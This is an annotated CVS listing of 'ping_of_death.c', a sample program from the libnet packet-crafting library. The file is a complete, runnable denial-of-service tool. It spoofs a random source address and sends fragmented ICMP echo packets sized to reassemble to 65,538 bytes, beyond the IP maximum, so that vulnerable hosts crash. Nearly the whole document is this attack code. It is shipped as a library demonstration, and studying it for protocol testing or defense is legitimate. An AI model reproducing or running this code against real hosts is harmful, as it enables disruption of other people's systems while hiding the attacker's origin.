Annotation of embedaddon/libnet/sample/ping_of_death.c, revision 1.1.1.1

1.1       misho       1: /*
                      2:  *  $Id: ping_of_death.c,v 1.2 2004/01/03 20:31:01 mike Exp $
                      3:  *
                      4:  *  libnet 1.1
                      5:  *  ICMP ping of death attack
                      6:  *
                      7:  *  Copyright (c) 1998 - 2004 Mike D. Schiffman <mike@infonexus.com>
                      8:  *  All rights reserved.
                      9:  *
                     10:  *  Copyright (c) 1999 - 2001 Dug Song <dugsong@monkey.org>
                     11:  *  All rights reserved.
                     12:  *
                     13:  * Redistribution and use in source and binary forms, with or without
                     14:  * modification, are permitted provided that the following conditions
                     15:  * are met:
                     16:  * 1. Redistributions of source code must retain the above copyright
                     17:  *    notice, this list of conditions and the following disclaimer.
                     18:  * 2. Redistributions in binary form must reproduce the above copyright
                     19:  *    notice, this list of conditions and the following disclaimer in the
                     20:  *    documentation and/or other materials provided with the distribution.
                     21:  *
                     22:  * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
                     23:  * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
                     24:  * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
                     25:  * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
                     26:  * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
                     27:  * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
                     28:  * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
                     29:  * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
                     30:  * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
                     31:  * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
                     32:  * SUCH DAMAGE.
                     33:  *
                     34:  */
                     35: 
                     36: #if (HAVE_CONFIG_H)
                     37: #include "../include/config.h"
                     38: #endif
                     39: #include "./libnet_test.h"
                     40: 
                     41: 
                     42: #define FRAG_LEN    1472
                     43: 
                     44: int
                     45: main(int argc, char **argv)
                     46: {
                     47:     libnet_t *l;
                     48:     libnet_ptag_t ip;
                     49:     libnet_ptag_t icmp;
                     50:     struct libnet_stats ls;
                     51:     u_long fakesrc, target;
                     52:     u_char *data;
                     53:     int c, i, flags, offset, len;
                     54:     char errbuf[LIBNET_ERRBUF_SIZE];
                     55:   
                     56:     printf("libnet 1.1 Ping of Death[raw]\n"); 
                     57: 
                     58:     /*
                     59:      *  Initialize the library.  Root priviledges are required.
                     60:      */
                     61:     l = libnet_init(
                     62:             LIBNET_RAW4,                            /* injection type */
                     63:             NULL,                                   /* network interface */
                     64:             errbuf);                                /* errbuf */
                     65:  
                     66:     if (l == NULL)
                     67:     {
                     68:         fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
                     69:         exit(EXIT_FAILURE);
                     70:     }
                     71: 
                     72:     if (argc != 2 || ((target = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE) == -1)))
                     73:     {
                     74:         fprintf(stderr, "Usage: %s <target>\n", argv[0]);
                     75:         exit(EXIT_FAILURE);
                     76:     }
                     77: 
                     78:     /* get random src addr. */
                     79:     libnet_seed_prand(l);
                     80:     fakesrc = libnet_get_prand(LIBNET_PRu32);
                     81:   
                     82:     data = malloc(FRAG_LEN);
                     83:     for (i = 0 ; i < FRAG_LEN ; i++)
                     84:     {
                     85:         /* fill it with something */
                     86:         data[i] = 0x3a;
                     87:     }
                     88: 
                     89:     ip   = LIBNET_PTAG_INITIALIZER;
                     90:     icmp = LIBNET_PTAG_INITIALIZER;
                     91: 
                     92:     for (i = 0 ; i < 65536 ; i += (LIBNET_ICMPV4_ECHO_H + FRAG_LEN))
                     93:     {
                     94:         offset = i;
                     95:         flags = 0;
                     96: 
                     97:         if (offset < 65120)
                     98:         {
                     99:             flags = IP_MF;
                    100:             len = FRAG_LEN;
                    101:         }
                    102:         else
                    103:         {
                    104:             /* for a total reconstructed length of 65538 bytes */
                    105:             len = 410;
                    106:         }
                    107: 
                    108:         icmp = libnet_build_icmpv4_echo(
                    109:             ICMP_ECHO,                                  /* type */
                    110:             0,                                          /* code */
                    111:             0,                                          /* checksum */
                    112:             666,                                        /* id */
                    113:             666,                                        /* sequence */
                    114:             data,                                       /* payload */
                    115:             len,                                        /* payload size */
                    116:             l,                                          /* libnet handle */
                    117:             icmp);                                      /* libnet ptag */
                    118:         if (icmp == -1)
                    119:         {
                    120:             fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l));
                    121:             goto bad;
                    122:         }
                    123:         /* no reason to do this */
                    124:         libnet_toggle_checksum(l, icmp, 0); 
                    125: 
                    126:         ip = libnet_build_ipv4(
                    127:             LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + len, /* length */
                    128:             0,                                          /* TOS */
                    129:             666,                                        /* IP ID */
                    130:             flags | (offset >> 3),                      /* IP Frag */
                    131:             64,                                         /* TTL */
                    132:             IPPROTO_ICMP,                               /* protocol */
                    133:             0,                                          /* checksum */
                    134:             fakesrc,                                    /* source IP */
                    135:             target,                                     /* destination IP */
                    136:             NULL,                                       /* payload */
                    137:             0,                                          /* payload size */
                    138:             l,                                          /* libnet handle */
                    139:             ip);                                        /* libnet ptag */
                    140:         if (ip == -1)
                    141:         {
                    142:             fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
                    143:             goto bad;
                    144:         }
                    145: 
                    146:         c = libnet_write(l);
                    147:         if (c == -1)
                    148:         {
                    149:             fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
                    150:         }
                    151: 
                    152:         /* tcpdump-style jonks. */
                    153:         printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_addr2name4(fakesrc,0),
                    154:                 argv[1], LIBNET_ICMPV4_ECHO_H + len, offset, flags ? "+" : "");
                    155:     }
                    156: 
                    157:     libnet_stats(l, &ls);
                    158:     fprintf(stderr, "Packets sent:  %lld\n"
                    159:                     "Packet errors: %lld\n"
                    160:                     "Bytes written: %lld\n",
                    161:                     ls.packets_sent, ls.packet_errors, ls.bytes_written);
                    162:     libnet_destroy(l);
                    163:     free(data);
                    164:     return (EXIT_SUCCESS);
                    165: bad:
                    166:     libnet_destroy(l);
                    167:     free(data);
                    168:     return (EXIT_FAILURE);
                    169: }
                    170: 
                    171: /* EOF */

FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>